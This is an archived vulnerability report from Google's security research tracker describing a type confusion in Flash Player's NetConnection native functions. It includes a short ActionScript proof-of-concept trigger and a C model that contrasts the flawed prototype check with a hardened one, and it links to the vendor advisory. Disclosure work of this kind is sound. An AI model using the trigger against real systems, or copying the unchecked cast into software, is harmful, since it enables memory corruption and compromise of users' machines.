ohio813 / google-security-research

Automatically exported from code.google.com/p/google-security-research

Type Confusion in NetConnection ASnative #229

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
When a NetConnection AS2 native function is called, the this object is verified 
to either have a type of NetConnection, or to be an untyped object that has a 
__proto__ descendant with type NetConnection. The this object's user data is 
then cast to type NetConnection. The userdata is not verified to be NULL if the 
object is not of type NetConnection. This means that type confusion can occur 
if the __proto__ of an untyped object with a non-null userdata (such as a 
native function object) is set to an object of type NetConnection.

var b = ASnative(2100, 0x77777777); // untyped native function object: its userdata is non-null
var n = new NetConnection();
b.__proto__ = n;                    // b now passes the "has a NetConnection in __proto__" check
var f = ASnative(2100, 0);          // NetConnection.connect
f.call(b, 1);                       // connect runs with b as `this`, casting b's userdata to NetConnection

A sample swf and .fla file are attached. To trigger the issue, press the purple 
button.

Original issue reported on code.google.com by natashe...@google.com on 15 Jan 2015 at 8:01

Attachments:
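The check described in the report can be shown in a small model of the native dispatch: an object carries a type tag, a `__proto__` link and an opaque `userdata` pointer, and the native `connect` accepts any `this` whose prototype chain contains a NetConnection and then casts the caller's own `userdata`. The following is an added example, not Flash Player code and not from the original report; all names (`ASObject`, `find_netconnection`, `connect_target_checked`, the `demo_*` helpers) and the object layout are constructed for illustration. It places the flawed lookup beside a hardened one that only ever casts the userdata of an object actually tagged as NetConnection, and rejects an untyped `this` that carries foreign userdata, which is the shape of the object built in the snippet above.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the AS2 object layout the report describes (hypothetical
   names; not Flash Player's real structures). */
typedef enum { T_UNTYPED, T_NETCONNECTION, T_NATIVE_FUNCTION } ASType;

typedef struct ASObject {
    ASType type;
    struct ASObject *proto;   /* __proto__ */
    void *userdata;           /* backing native object; its real type depends on `type` */
} ASObject;

typedef struct { int connected; char uri[64]; } NetConnection;   /* constructed backing object */

/* Walk the __proto__ chain (bounded) looking for a NetConnection-typed object. */
static ASObject *find_netconnection(ASObject *obj) {
    for (int depth = 0; obj && depth < 32; obj = obj->proto, depth++)
        if (obj->type == T_NETCONNECTION) return obj;
    return NULL;
}

/* Lookup as the report describes it: a NetConnection anywhere in the chain is
   enough, and `this`'s own userdata is cast regardless of `this`'s type. When
   `this` is a native function object, the returned pointer is not a NetConnection. */
NetConnection *connect_target_unchecked(ASObject *self) {
    if (!find_netconnection(self)) return NULL;
    return (NetConnection *)self->userdata;
}

/* Hardened lookup: only a NetConnection-typed object's userdata is ever cast.
   An untyped `this` must carry NULL userdata; it then resolves to the
   NetConnection reached through __proto__. Anything else is rejected. */
NetConnection *connect_target_checked(ASObject *self) {
    if (self->type == T_NETCONNECTION)
        return (NetConnection *)self->userdata;
    if (self->type != T_UNTYPED || self->userdata != NULL)
        return NULL;                               /* foreign userdata or wrong type */
    ASObject *nc = find_netconnection(self->proto);
    return nc ? (NetConnection *)nc->userdata : NULL;
}

/* Native connect: returns 1 if it ran on a genuine NetConnection, 0 if rejected. */
int netconnection_connect(ASObject *self, const char *uri, int hardened) {
    NetConnection *nc = hardened ? connect_target_checked(self)
                                 : connect_target_unchecked(self);
    if (!nc) return 0;
    strncpy(nc->uri, uri, sizeof nc->uri - 1);
    nc->uri[sizeof nc->uri - 1] = '\0';
    nc->connected = 1;
    return 1;
}

/* Constructed objects mirroring the report's snippet: `n` (a real NetConnection),
   `b` (a native function object whose __proto__ was pointed at `n`), and a benign
   untyped wrapper that merely inherits from `n`. */
static NetConnection g_nc;
static int g_native_fn;                       /* stands in for a native function's userdata */
static ASObject g_nc_obj   = { T_NETCONNECTION,   NULL,      &g_nc };
static ASObject g_fn_obj   = { T_NATIVE_FUNCTION, &g_nc_obj, &g_native_fn };
static ASObject g_wrap_obj = { T_UNTYPED,         &g_nc_obj, NULL };

ASObject *demo_legit_this(void)    { return &g_nc_obj; }
ASObject *demo_confused_this(void) { return &g_fn_obj; }
ASObject *demo_wrapper_this(void)  { return &g_wrap_obj; }

int main(void) {
    /* The unchecked path hands back the native function's memory as a NetConnection. */
    printf("unchecked on confused this: %s\n",
           connect_target_unchecked(demo_confused_this()) == (NetConnection *)&g_native_fn
               ? "wrong object cast" : "ok");
    printf("hardened on confused this: %s\n",
           netconnection_connect(demo_confused_this(), "rtmp://example.invalid/app", 1) ? "accepted" : "rejected");
    printf("hardened on real NetConnection: %s\n",
           netconnection_connect(demo_legit_this(), "rtmp://example.invalid/app", 1) ? "accepted" : "rejected");
    printf("hardened on untyped wrapper: %s\n",
           connect_target_checked(demo_wrapper_this()) == &g_nc ? "resolved via __proto__" : "rejected");
    return 0;
}
```

The hardened lookup makes the cast depend on the tag of the object whose userdata is being cast, not on what is reachable through `__proto__`; the prototype walk is only used to resolve a plain untyped wrapper, and such a wrapper is required to have NULL userdata.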

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 18 Jan 2015 at 10:50

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 19 Jan 2015 at 8:09

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 6 Mar 2015 at 6:05

GoogleCodeExporter commented 9 years ago
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html

Original comment by cev...@google.com on 12 Mar 2015 at 7:35

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 19 Mar 2015 at 7:57

GoogleCodeExporter commented 9 years ago
Adding exploit code

Original comment by natashe...@google.com on 13 Apr 2015 at 6:22

Attachments: